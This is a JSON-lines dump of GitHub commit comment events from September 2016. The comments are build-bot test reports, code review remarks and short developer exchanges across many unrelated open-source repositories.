{"id":"4593736347","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19107385,"position":null,"line":null,"path":null,"commit_id":"adf12cf0a2732048ad0cd5cf06c06af74de512da","created_at":"2016-09-21T02:46:48Z","updated_at":"2016-09-21T02:46:48Z","body":"GetInternalVariableBug (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-adf12cf0a2732048ad0cd5cf06c06af74de512da-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-21T02:46:48Z"}
{"id":"4593738891","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19107398,"position":null,"line":null,"path":null,"commit_id":"f0ad4d118f63f5334be54fab1f77be147491ee5e","created_at":"2016-09-21T02:47:47Z","updated_at":"2016-09-21T02:47:47Z","body":"MoreDayliteFollowup (JasonGlazer) - i386-Windows-7-VisualStudio-12: OK (2330 of 2338 tests passed, 26 test warnings)\n\n * 5 tests had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 32 tests had: AUD diffs.\n * 15 tests had: Table small diffs.\n * 8 tests had: Table big diffs.\n * 3 tests had: RDD diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0ad4d118f63f5334be54fab1f77be147491ee5e-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0ad4d118f63f5334be54fab1f77be147491ee5e-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.66%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T02:47:47Z"}
{"id":"4593747389","type":"CommitCommentEvent","actor":{"login":"EdersonMonteiro"},"repo":{"name":"EdersonMonteiro/hello-word"},"payload":{"comment":{"id":19107418,"position":null,"line":null,"path":null,"commit_id":"651e4561ab85939ce00429472d02d0d9caaf902c","created_at":"2016-09-21T02:50:53Z","updated_at":"2016-09-21T02:50:53Z","body":"updating changes to master's base"}},"created_at":"2016-09-21T02:50:53Z"}
{"id":"4593747793","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/screeps"},"payload":{"comment":{"id":19107420,"position":null,"line":null,"path":null,"commit_id":"51e030abd0e488c0cdbc228c078e219a7ebddffb","created_at":"2016-09-21T02:51:03Z","updated_at":"2016-09-21T02:51:03Z","body":"I was calculating ticksSinceLastAccident every tick anyway, why not just keep that in Memory instead and increment it each tick?"}},"created_at":"2016-09-21T02:51:03Z"}
{"id":"4593750001","type":"CommitCommentEvent","actor":{"login":"EMELZ3"},"repo":{"name":"EMELZ3/Demo-Favorite-Cookies-Web-Page"},"payload":{"comment":{"id":19107427,"position":null,"line":null,"path":null,"commit_id":"d249a03e41aaf620ce2efc98c64887265b2c9357","created_at":"2016-09-21T02:51:51Z","updated_at":"2016-09-21T02:51:51Z","body":"hi test"}},"created_at":"2016-09-21T02:51:51Z"}
{"id":"4593750757","type":"CommitCommentEvent","actor":{"login":"codebrainz"},"repo":{"name":"geany/geany"},"payload":{"comment":{"id":19107429,"position":55,"line":364,"path":"doc/plugins.dox","commit_id":"437837d3a54367393c41d6c1e1f4d1af4481627e","created_at":"2016-09-21T02:52:08Z","updated_at":"2016-09-21T02:52:08Z","body":"Sorry for the spam, but a related idea (so I can find it later). We could have a macro like this:\r\n\r\n```c\r\n#define GEANY_PLUGIN_REGISTER_OBJECT(plugin, min_api, gtype, ...)  \\\r\n  GEANY_PLUGIN_REGISTER_FULL (plugin,                              \\\r\n                              min_api,                             \\\r\n                              g_object_new (gtype, ##__VA_ARGS__), \\\r\n                              g_object_unref)\r\n```\r\n\r\nTo provide syntax sugar to bind a GObject to the module's lifetime."}},"created_at":"2016-09-21T02:52:08Z"}
{"id":"4593751061","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/screeps"},"payload":{"comment":{"id":19107430,"position":45,"line":57,"path":"main.js","commit_id":"51e030abd0e488c0cdbc228c078e219a7ebddffb","created_at":"2016-09-21T02:52:15Z","updated_at":"2016-09-21T02:52:15Z","body":"I could have removed the first part of this conditional by changing the 0 to 1 when resetting `Memory.ticksSinceLastAccident` on [line 48](https://github.com/sethten/screeps/commit/51e030abd0e488c0cdbc228c078e219a7ebddffb#diff-7a9076d6d94e62c13d641aa71f19ae8eR48), but I think this is more clear."}},"created_at":"2016-09-21T02:52:15Z"}
{"id":"4593752589","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/screeps"},"payload":{"comment":{"id":19107435,"position":31,"line":50,"path":"main.js","commit_id":"51e030abd0e488c0cdbc228c078e219a7ebddffb","created_at":"2016-09-21T02:52:48Z","updated_at":"2016-09-21T02:52:48Z","body":"I could have just executed the body of this conditional regardless, but this more clearly expresses the intent of this code block."}},"created_at":"2016-09-21T02:52:48Z"}
{"id":"4593752610","type":"CommitCommentEvent","actor":{"login":"EMELZ3"},"repo":{"name":"EMELZ3/Demo-Favorite-Cookies-Web-Page"},"payload":{"comment":{"id":19107437,"position":null,"line":null,"path":null,"commit_id":"d249a03e41aaf620ce2efc98c64887265b2c9357","created_at":"2016-09-21T02:52:49Z","updated_at":"2016-09-21T02:52:49Z","body":"hi test2"}},"created_at":"2016-09-21T02:52:49Z"}
{"id":"4593752629","type":"CommitCommentEvent","actor":{"login":"2ion"},"repo":{"name":"BunsenLabs/bunsen-pipemenus"},"payload":{"comment":{"id":19107438,"position":null,"line":null,"path":null,"commit_id":"64133dd99db0542dbbc4f739b7003a78af2ea477","created_at":"2016-09-21T02:52:49Z","updated_at":"2016-09-21T02:52:49Z","body":"a) `#!/bin/bash`, `/usr/bin/env python` as shebang will do the right thing.\r\nb) I don't see how this helps editing scripts? `vim foo` (perhaps double-click in a GUI).\r\nc) Yes I didn't follow all those small changes to this repository. In fact, I've lost track of merlin vs deuterium a while ago."}},"created_at":"2016-09-21T02:52:49Z"}
{"id":"4593752889","type":"CommitCommentEvent","actor":{"login":"mamorales15"},"repo":{"name":"mamorales15/HelpfulResources"},"payload":{"comment":{"id":19107440,"position":null,"line":null,"path":null,"commit_id":"8a9e69988329900c4fa83dd63736b2595eface3e","created_at":"2016-09-21T02:52:55Z","updated_at":"2016-09-21T02:52:55Z","body":"I accidently wrote that I committed the shell script to start a PHP server, but I actually didn't."}},"created_at":"2016-09-21T02:52:55Z"}
{"id":"4593755523","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/screeps"},"payload":{"comment":{"id":19107444,"position":26,"line":45,"path":"main.js","commit_id":"51e030abd0e488c0cdbc228c078e219a7ebddffb","created_at":"2016-09-21T02:53:55Z","updated_at":"2016-09-21T02:53:55Z","body":"Should always notify \"Room controller at level 3 has a downgrade timer at 9000\" with the constants set as they are"}},"created_at":"2016-09-21T02:53:55Z"}
{"id":"4593756060","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/screeps"},"payload":{"comment":{"id":19107446,"position":24,"line":43,"path":"main.js","commit_id":"51e030abd0e488c0cdbc228c078e219a7ebddffb","created_at":"2016-09-21T02:54:08Z","updated_at":"2016-09-21T02:54:08Z","body":"Only works for RCL 3"}},"created_at":"2016-09-21T02:54:08Z"}
{"id":"4593757047","type":"CommitCommentEvent","actor":{"login":"kd0aij"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":19107450,"position":null,"line":null,"path":null,"commit_id":"900026818b772ef848749e366b722817b3fc6fc4","created_at":"2016-09-21T02:54:30Z","updated_at":"2016-09-21T02:54:30Z","body":"with latest master, \"make fmu\"  and \"make pos\" auto-complete properly, but\n\"make posix_sitl_default \" shows no autocomplete options\n\nOn Tue, Sep 20, 2016 at 6:26 PM Carlo Wood <notifications@github.com> wrote:\n\n> Has this been fixed by #5491 <https://github.com/PX4/Firmware/pull/5491>\n> or are there still issues left?\n> Thanks. Sorry for the late reaction here, I missed the comments here until\n> I (finally!) read my email again :/\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/PX4/Firmware/commit/900026818b772ef848749e366b722817b3fc6fc4#commitcomment-19106405>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACMZPUFieI_OJMyPxr0jkBBWTKqUgWBQks5qsHm0gaJpZM4J-w0Z>\n> .\n>\n"}},"created_at":"2016-09-21T02:54:30Z"}
{"id":"4593758143","type":"CommitCommentEvent","actor":{"login":"jwvg0425"},"repo":{"name":"pjc0247/LinqExpressionSnippets"},"payload":{"comment":{"id":19107454,"position":null,"line":null,"path":null,"commit_id":"d6d53dd453b416936dda55b49b5f64baf240078b","created_at":"2016-09-21T02:54:58Z","updated_at":"2016-09-21T02:54:58Z","body":"개쩐다"}},"created_at":"2016-09-21T02:54:58Z"}
{"id":"4593758895","type":"CommitCommentEvent","actor":{"login":"pjc0247"},"repo":{"name":"pjc0247/LinqExpressionSnippets"},"payload":{"comment":{"id":19107456,"position":null,"line":null,"path":null,"commit_id":"d6d53dd453b416936dda55b49b5f64baf240078b","created_at":"2016-09-21T02:55:16Z","updated_at":"2016-09-21T02:55:16Z","body":"님제발"}},"created_at":"2016-09-21T02:55:16Z"}
{"id":"4593764938","type":"CommitCommentEvent","actor":{"login":"max-konin"},"repo":{"name":"KernelCorp/kvartiroom"},"payload":{"comment":{"id":19107471,"position":15,"line":12,"path":"frontend/site/app/routes/realty.coffee","commit_id":"c74b9028ad33010f3060073aaaef5d580fbb22d3","created_at":"2016-09-21T02:57:33Z","updated_at":"2016-09-21T02:57:33Z","body":"Это не верно. Что бы получпть currentUser в контроллере нужно сделать инджект сессии\r\n```coffescript\r\nsesstion: Ember.inject.service()\r\n```"}},"created_at":"2016-09-21T02:57:33Z"}
{"id":"4593766811","type":"CommitCommentEvent","actor":{"login":"vrv"},"repo":{"name":"tensorflow/tensorflow"},"payload":{"comment":{"id":19107474,"position":null,"line":null,"path":null,"commit_id":"6cc37af4fb179c11504874d60ad53e4a91a4a887","created_at":"2016-09-21T02:58:13Z","updated_at":"2016-09-21T02:58:13Z","body":"The heuristic only applies if there are no devices already assigned to the node by the client, so I suspect the problem you're having is elsewhere"}},"created_at":"2016-09-21T02:58:13Z"}
{"id":"4593768902","type":"CommitCommentEvent","actor":{"login":"ramanjine"},"repo":{"name":"ramanjine/sigmalabs5"},"payload":{"comment":{"id":19107479,"position":null,"line":null,"path":null,"commit_id":"8be0b612416b061b73fba428572e061bbb1bacb9","created_at":"2016-09-21T02:59:05Z","updated_at":"2016-09-21T02:59:05Z","body":"merge"}},"created_at":"2016-09-21T02:59:05Z"}
{"id":"4593769786","type":"CommitCommentEvent","actor":{"login":"makrma"},"repo":{"name":"makrma/learngit"},"payload":{"comment":{"id":19107480,"position":null,"line":null,"path":null,"commit_id":"d7b0744c6f6a9c4e9aaba833a66dd988eb2fa318","created_at":"2016-09-21T02:59:26Z","updated_at":"2016-09-21T02:59:26Z","body":"dd"}},"created_at":"2016-09-21T02:59:26Z"}
{"id":"4593769824","type":"CommitCommentEvent","actor":{"login":"SalvorinFex"},"repo":{"name":"feilipu/Arduino_FreeRTOS_Library"},"payload":{"comment":{"id":19107481,"position":null,"line":null,"path":null,"commit_id":"8068268f1762866ef6e85b5e6163831f26a605f6","created_at":"2016-09-21T02:59:27Z","updated_at":"2016-09-21T02:59:27Z","body":"Cool, glad to have helped."}},"created_at":"2016-09-21T02:59:27Z"}
{"id":"4593769984","type":"CommitCommentEvent","actor":{"login":"makrma"},"repo":{"name":"makrma/learngit"},"payload":{"comment":{"id":19107483,"position":null,"line":null,"path":null,"commit_id":"d7b0744c6f6a9c4e9aaba833a66dd988eb2fa318","created_at":"2016-09-21T02:59:31Z","updated_at":"2016-09-21T02:59:31Z","body":"dd"}},"created_at":"2016-09-21T02:59:31Z"}
{"id":"4593769985","type":"CommitCommentEvent","actor":{"login":"max-konin"},"repo":{"name":"KernelCorp/kvartiroom"},"payload":{"comment":{"id":19107484,"position":5,"line":49,"path":"app/policies/realty_policy.rb","commit_id":"40a4e101138a56e26feeac58c328060f9df351c5","created_at":"2016-09-21T02:59:31Z","updated_at":"2016-09-21T02:59:31Z","body":"Визиты должны сохраняться отдельно а не как вложенные документы вместе с сохранением недвижимости"}},"created_at":"2016-09-21T02:59:31Z"}
{"id":"4598580339","type":"CommitCommentEvent","actor":{"login":"jerichoi224"},"repo":{"name":"SebastianJay/Wilderness"},"payload":{"comment":{"id":19119748,"position":5,"line":5,"path":"src/window_draw.py","commit_id":"83f588d3ed1f3d74a7be60df7aba5d6b512c32e3","created_at":"2016-09-21T20:01:51Z","updated_at":"2016-09-21T20:01:51Z","body":"I'm still working on this, but I wasn't sure how to make a list of undefined amount of lists, so I just used dict for now. Might need to figure that out."}},"created_at":"2016-09-21T20:01:51Z"}
{"id":"4598581742","type":"CommitCommentEvent","actor":{"login":"karololszak"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":19119754,"position":null,"line":null,"path":null,"commit_id":"ef11873a4eeb9bdf078f6aaf1867b09193a0e216","created_at":"2016-09-21T20:02:08Z","updated_at":"2016-09-21T20:02:08Z","body":"It doesn't install npm. It runs `npm install` which gets all the script deps.\r\n\r\nThis PR installs nodejs (which has npm in the dependencies): https://github.com/PokemonGoMap/PokemonGo-Map/pull/1217"}},"created_at":"2016-09-21T20:02:08Z"}
{"id":"4598584168","type":"CommitCommentEvent","actor":{"login":"jerichoi224"},"repo":{"name":"SebastianJay/Wilderness"},"payload":{"comment":{"id":19119764,"position":8,"line":8,"path":"src/window_draw.py","commit_id":"83f588d3ed1f3d74a7be60df7aba5d6b512c32e3","created_at":"2016-09-21T20:02:34Z","updated_at":"2016-09-21T20:02:34Z","body":"Right... I think I ended up using char_since_space instead..."}},"created_at":"2016-09-21T20:02:34Z"}
{"id":"4598586154","type":"CommitCommentEvent","actor":{"login":"jawshooah"},"repo":{"name":"Homebrew/brew"},"payload":{"comment":{"id":19119777,"position":5,"line":45,"path":"Library/Homebrew/os/mac.rb","commit_id":"6a8f22d3510fc92e2fb67c85bd4429d2aa218eea","created_at":"2016-09-21T20:02:55Z","updated_at":"2016-09-21T20:02:55Z","body":"`@languages ||= if ...`"}},"created_at":"2016-09-21T20:02:55Z"}
{"id":"4598591042","type":"CommitCommentEvent","actor":{"login":"jerichoi224"},"repo":{"name":"SebastianJay/Wilderness"},"payload":{"comment":{"id":19119789,"position":24,"line":24,"path":"src/window_draw.py","commit_id":"83f588d3ed1f3d74a7be60df7aba5d6b512c32e3","created_at":"2016-09-21T20:03:51Z","updated_at":"2016-09-21T20:03:51Z","body":"good point.."}},"created_at":"2016-09-21T20:03:51Z"}
{"id":"4598594816","type":"CommitCommentEvent","actor":{"login":"jerichoi224"},"repo":{"name":"SebastianJay/Wilderness"},"payload":{"comment":{"id":19119802,"position":14,"line":14,"path":"src/window_draw.py","commit_id":"83f588d3ed1f3d74a7be60df7aba5d6b512c32e3","created_at":"2016-09-21T20:04:31Z","updated_at":"2016-09-21T20:04:31Z","body":"Wait.. so... forexample, if we have 10 lines, and the limit is 4, we just display lines 7, 8, 9, 10?? "}},"created_at":"2016-09-21T20:04:31Z"}
{"id":"4598603709","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaDiffEq/DifferentialEquations.jl"},"payload":{"comment":{"id":19119825,"position":3,"line":7,"path":".travis.yml","commit_id":"92b6e583bdd7462127b13becd439188b2a1e4045","created_at":"2016-09-21T20:06:06Z","updated_at":"2016-09-21T20:06:06Z","body":"nightly is 0.6-dev, should add an `- 0.5` line here to test against 0.5 releases"}},"created_at":"2016-09-21T20:06:06Z"}
{"id":"4598607899","type":"CommitCommentEvent","actor":{"login":"CptChaos"},"repo":{"name":"SunDwarf/OWAPI"},"payload":{"comment":{"id":19119840,"position":null,"line":null,"path":null,"commit_id":"4fa1f932a4e7a68d2a4fb7f03f34a36766e40a67","created_at":"2016-09-21T20:06:51Z","updated_at":"2016-09-21T20:06:51Z","body":"I want to save the stats (seperated) locally in JSON format (to be able to build a history), and decode when needed for example for the views. "}},"created_at":"2016-09-21T20:06:51Z"}
{"id":"4598616093","type":"CommitCommentEvent","actor":{"login":"kasper93"},"repo":{"name":"kasper93/mpc-hc"},"payload":{"comment":{"id":19119861,"position":null,"line":null,"path":null,"commit_id":"209985cde61ed382e5ed0a929ecf6eb07decd1fe","created_at":"2016-09-21T20:08:09Z","updated_at":"2016-09-21T20:08:09Z","body":"Could work too I guess.  Good idea."}},"created_at":"2016-09-21T20:08:09Z"}
{"id":"4598620473","type":"CommitCommentEvent","actor":{"login":"Wndrr"},"repo":{"name":"Wndrr/Ponteilla"},"payload":{"comment":{"id":19119874,"position":null,"line":null,"path":null,"commit_id":"c111d9a06fe3f48be65af3fe1ed8959b1f112ca6","created_at":"2016-09-21T20:08:56Z","updated_at":"2016-09-21T20:08:56Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;LrMWj43N&#x2F;46-refactor-textimage-generation\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Refactor textImage generation</a>"}},"created_at":"2016-09-21T20:08:56Z"}
{"id":"4598622009","type":"CommitCommentEvent","actor":{"login":"ebaydayz"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19119880,"position":null,"line":null,"path":null,"commit_id":"4e946552fde230c54f0c2f5d8648e3b25b16be39","created_at":"2016-09-21T20:09:12Z","updated_at":"2016-09-21T20:09:12Z","body":"Good catch, thanks."}},"created_at":"2016-09-21T20:09:12Z"}
{"id":"4598622555","type":"CommitCommentEvent","actor":{"login":"MrAE"},"repo":{"name":"neurodata/synaptome-stats"},"payload":{"comment":{"id":19119881,"position":null,"line":null,"path":null,"commit_id":"f82502aa821e4c74c8fda0fa3a6ca9abf22e337c","created_at":"2016-09-21T20:09:19Z","updated_at":"2016-09-21T20:09:19Z","body":"@jovo [Here's the html](http://docs.neurodata.io/synaptome-stats/Code/Discrimination.html)"}},"created_at":"2016-09-21T20:09:19Z"}
{"id":"4598624938","type":"CommitCommentEvent","actor":{"login":"vincent-legoll"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19119886,"position":5,"line":22,"path":"config/sources/pine64.conf","commit_id":"b62ed03b96c3fe56282feebf5de7a73ada2014e2","created_at":"2016-09-21T20:09:44Z","updated_at":"2016-09-21T20:09:44Z","body":"Is that hunk related to $SUBJECT ?"}},"created_at":"2016-09-21T20:09:44Z"}
{"id":"4598625142","type":"CommitCommentEvent","actor":{"login":"dragon1982"},"repo":{"name":"godsone/try_git"},"payload":{"comment":{"id":19119887,"position":null,"line":null,"path":null,"commit_id":"44946227478e482b78c8689fafbb6f12aee3b236","created_at":"2016-09-21T20:09:47Z","updated_at":"2016-09-21T20:09:47Z","body":"hello i downloaded the thenaughtyandthenice.com-master script but in the admin interface gives me error I ptreste help to install thanks\r\n  the link of the admin and site: http://www.karimachat.com/admin/settings"}},"created_at":"2016-09-21T20:09:47Z"}
{"id":"4598632532","type":"CommitCommentEvent","actor":{"login":"Hyzual"},"repo":{"name":"Hyzual/knotsjs"},"payload":{"comment":{"id":19119899,"position":21,"line":21,"path":"lib/dependencies.js","commit_id":"4e1d556f82b35ea7da494000cef08c5025fdb9fc","created_at":"2016-09-21T20:11:08Z","updated_at":"2016-09-21T20:11:08Z","body":"Thanks for letting me know 😄 I'll update accordingly when I get the chance"}},"created_at":"2016-09-21T20:11:08Z"}
{"id":"4598632790","type":"CommitCommentEvent","actor":{"login":"VoronyukM"},"repo":{"name":"kaikuo/issue_id"},"payload":{"comment":{"id":19119901,"position":5,"line":4,"path":"app/views/auto_completes/issues.html.erb","commit_id":"4f3042cbacb7eccb30d563b3f66d50edc2221a33","created_at":"2016-09-21T20:11:10Z","updated_at":"2016-09-21T20:11:10Z","body":"What is the change for? Without the change the subtask creation is OK. With the change\r\n1) when I change \"Parent task\" to another issue using issue-ID (e.g. MYPROJECT-123) and select it from the dropbox, the issue-ID is substituded by usual ID.\r\n2) the same in \"Related issues\" \"Issue #\" field.\r\n\r\nIMHO the change in this file should be reverted.\r\n\r\nThe addition in lib/issue_ids_controller_patch.rb is fix #2 indeed and I'm ready to accept it."}},"created_at":"2016-09-21T20:11:10Z"}
{"id":"4598639647","type":"CommitCommentEvent","actor":{"login":"rburkey2005"},"repo":{"name":"mattcarberry/virtualagc"},"payload":{"comment":{"id":19119919,"position":125,"line":149,"path":"Aurora12/ASCENT_INERTIA_UPDATER.agc","commit_id":"fc9be773b8f6adf536a6822209f3a09847d857b4","created_at":"2016-09-21T20:12:26Z","updated_at":"2016-09-21T20:12:26Z","body":"There's no such thing as a division symbol.  Program labels and variable names in AGC language can contain any character whatsoever.  \"1/2JETSV\" is the actual variable name.  It is left exactly as-is.\r\n"}},"created_at":"2016-09-21T20:12:26Z"}
{"id":"4598639840","type":"CommitCommentEvent","actor":{"login":"azah"},"repo":{"name":"SunDwarf/OWAPI"},"payload":{"comment":{"id":19119920,"position":null,"line":null,"path":null,"commit_id":"4fa1f932a4e7a68d2a4fb7f03f34a36766e40a67","created_at":"2016-09-21T20:12:28Z","updated_at":"2016-09-21T20:12:28Z","body":"You should be able to anyways?\r\nPseudocode example in python: \r\n```python\r\nfor hero in dict['us']['heroes']['stats']['quickplay']:\r\n  hero['general_stats']['medals_gold']\r\n  hero['general_stats']['medals_silver']\r\n```\r\netc."}},"created_at":"2016-09-21T20:12:28Z"}
{"id":"4598641308","type":"CommitCommentEvent","actor":{"login":"vreshch"},"repo":{"name":"garage-it/SmartHouse-frontend"},"payload":{"comment":{"id":19119924,"position":null,"line":null,"path":null,"commit_id":"d06ed51339d0d5f8f8d3acdc7312a841fcee5c83","created_at":"2016-09-21T20:12:43Z","updated_at":"2016-09-21T20:12:43Z","body":"+1"}},"created_at":"2016-09-21T20:12:43Z"}
{"id":"4598641649","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19119926,"position":null,"line":null,"path":null,"commit_id":"05866ee3ce0d9d6c8c62742664da6955b9d88932","created_at":"2016-09-21T20:12:46Z","updated_at":"2016-09-21T20:12:46Z","body":"all tests pass:\nsuccess: http://buildbot.bos1/builders/test-riak_kv/builds/3960\n"}},"created_at":"2016-09-21T20:12:46Z"}
{"id":"4598645565","type":"CommitCommentEvent","actor":{"login":"ccd0"},"repo":{"name":"nebukazar/OneeChan"},"payload":{"comment":{"id":19119936,"position":5,"line":57,"path":"src/css/Original.css","commit_id":"1451db0c2f75902213648d472963f9a817c82576","created_at":"2016-09-21T20:13:25Z","updated_at":"2016-09-21T20:13:25Z","body":"Looks like a typo here."}},"created_at":"2016-09-21T20:13:25Z"}
{"id":"4598645582","type":"CommitCommentEvent","actor":{"login":"rburkey2005"},"repo":{"name":"mattcarberry/virtualagc"},"payload":{"comment":{"id":19119937,"position":125,"line":149,"path":"Aurora12/ASCENT_INERTIA_UPDATER.agc","commit_id":"fc9be773b8f6adf536a6822209f3a09847d857b4","created_at":"2016-09-21T20:13:25Z","updated_at":"2016-09-21T20:13:25Z","body":"I'm sure you knew that it was part of the label, but others who might read this might not."}},"created_at":"2016-09-21T20:13:25Z"}
{"id":"4598648564","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"mdlugosz1/kodilla-javascript"},"payload":{"comment":{"id":19119941,"position":22,"line":18,"path":"js/scripts.js","commit_id":"42b40f6770ee330cf37e9ff1ab50c5c7f7925692","created_at":"2016-09-21T20:13:57Z","updated_at":"2016-09-21T20:13:57Z","body":"To samo co w poprzednim zadaniu.\r\nZadeklaruj zmienne, aby miały `var` lub po przecinku."}},"created_at":"2016-09-21T20:13:57Z"}
{"id":"4598648568","type":"CommitCommentEvent","actor":{"login":"mattcarberry"},"repo":{"name":"mattcarberry/virtualagc"},"payload":{"comment":{"id":19119942,"position":125,"line":149,"path":"Aurora12/ASCENT_INERTIA_UPDATER.agc","commit_id":"fc9be773b8f6adf536a6822209f3a09847d857b4","created_at":"2016-09-21T20:13:57Z","updated_at":"2016-09-21T20:13:57Z","body":"Ah. I understood that. However, there's a division symbol in the comment at the end of the line."}},"created_at":"2016-09-21T20:13:57Z"}
{"id":"4598653941","type":"CommitCommentEvent","actor":{"login":"dessalines"},"repo":{"name":"dessalines/flowchat"},"payload":{"comment":{"id":19119960,"position":null,"line":null,"path":null,"commit_id":"2c36dbf7b0294acfc93719500ee4c1fd1d19efbc","created_at":"2016-09-21T20:14:56Z","updated_at":"2016-09-21T20:14:56Z","body":"#54 "}},"created_at":"2016-09-21T20:14:56Z"}
{"id":"4598654945","type":"CommitCommentEvent","actor":{"login":"UnderFact"},"repo":{"name":"UnderFact/Random-Code"},"payload":{"comment":{"id":19119964,"position":null,"line":null,"path":null,"commit_id":"5f524c277311cf5d7fad36905db4fd187a0563ec","created_at":"2016-09-21T20:15:08Z","updated_at":"2016-09-21T20:15:08Z","body":"Enables updates for windows xp until 2019"}},"created_at":"2016-09-21T20:15:08Z"}
{"id":"4598657540","type":"CommitCommentEvent","actor":{"login":"juliemr"},"repo":{"name":"angular/protractor"},"payload":{"comment":{"id":19119973,"position":5,"line":17,"path":"docs/browser-setup.md","commit_id":"d6061f2acd36e8044094d7107aaf7dbbe51d1b86","created_at":"2016-09-21T20:15:36Z","updated_at":"2016-09-21T20:15:36Z","body":"typo, should be `config`"}},"created_at":"2016-09-21T20:15:36Z"}
{"id":"4598659918","type":"CommitCommentEvent","actor":{"login":"gschmidt-usgs"},"repo":{"name":"USGS-EROS/espa-l2qa-tools"},"payload":{"comment":{"id":19119980,"position":null,"line":null,"path":null,"commit_id":"038e0eaab87e80526bda2d5af26840f5a0af3487","created_at":"2016-09-21T20:16:02Z","updated_at":"2016-09-21T20:16:02Z","body":"Change is good"}},"created_at":"2016-09-21T20:16:02Z"}
{"id":"4598660840","type":"CommitCommentEvent","actor":{"login":"juliemr"},"repo":{"name":"angular/protractor"},"payload":{"comment":{"id":19119983,"position":384,"line":2,"path":"docs/referenceConf.js","commit_id":"d6061f2acd36e8044094d7107aaf7dbbe51d1b86","created_at":"2016-09-21T20:16:13Z","updated_at":"2016-09-21T20:16:13Z","body":"Let's give a full link here."}},"created_at":"2016-09-21T20:16:13Z"}
{"id":"4598662798","type":"CommitCommentEvent","actor":{"login":"santaclauss"},"repo":{"name":"Datatekniikka/TaistoCMS"},"payload":{"comment":{"id":19119988,"position":113,"line":113,"path":"README_FI.md","commit_id":"ab86fe868c7b784ce91fb947c6ca232feab6e73d","created_at":"2016-09-21T20:16:35Z","updated_at":"2016-09-21T20:16:35Z","body":"Perse"}},"created_at":"2016-09-21T20:16:35Z"}
{"id":"4598663099","type":"CommitCommentEvent","actor":{"login":"El-Mango"},"repo":{"name":"CyanogenMod/android_device_samsung_serranoltexx"},"payload":{"comment":{"id":19119990,"position":null,"line":null,"path":null,"commit_id":"66ecc719ace9b37ae94cbcc77a99242cfe855ad0","created_at":"2016-09-21T20:16:39Z","updated_at":"2016-09-21T20:16:39Z","body":"OK. Tnx.\n\n2016-09-21 19:13 GMT+02:00 Arne Coucheron <notifications@github.com>:\n\n> Yes, this just changes the initial default value to 3G. You can still\n> manually change it to LTE.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/CyanogenMod/android_device_samsung_serranoltexx/commit/66ecc719ace9b37ae94cbcc77a99242cfe855ad0#commitcomment-19117170>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AHbIIst-lBtoJJHHq2iCXenSEY8e2EnLks5qsWWfgaJpZM4KCcoY>\n> .\n>\n"}},"created_at":"2016-09-21T20:16:39Z"}
{"id":"4598667510","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"EwaPerzanowska/learning-sass"},"payload":{"comment":{"id":19120000,"position":65,"line":65,"path":"gruntfile.js","commit_id":"1b4cfbffb05eccc553ec0967cd0de235b8d22dd1","created_at":"2016-09-21T20:17:28Z","updated_at":"2016-09-21T20:17:28Z","body":"Zmień kolejność tasków i będzie działać.\r\n\r\n'sass','imagemin','browserSync','watch'\r\nhttps://www.browsersync.io/docs/grunt#grunt-watch"}},"created_at":"2016-09-21T20:17:28Z"}
{"id":"4598668873","type":"CommitCommentEvent","actor":{"login":"scheng123"},"repo":{"name":"kzahel/web-server-chrome"},"payload":{"comment":{"id":19120003,"position":null,"line":null,"path":null,"commit_id":"f22a394a9aa1f3bf5154c4918a97fa64e852f4fe","created_at":"2016-09-21T20:17:42Z","updated_at":"2016-09-21T20:17:42Z","body":"so dev mode changed the api huh? well, the \"exception\" variable is getting popular, especially in java..."}},"created_at":"2016-09-21T20:17:42Z"}
{"id":"4598677620","type":"CommitCommentEvent","actor":{"login":"santaclauss"},"repo":{"name":"Datatekniikka/TaistoCMS"},"payload":{"comment":{"id":19120015,"position":3,"line":11,"path":"database.sql","commit_id":"4518983add7d95d75176bc855517740c6838ce6a","created_at":"2016-09-21T20:19:19Z","updated_at":"2016-09-21T20:19:19Z","body":"Tv"}},"created_at":"2016-09-21T20:19:19Z"}
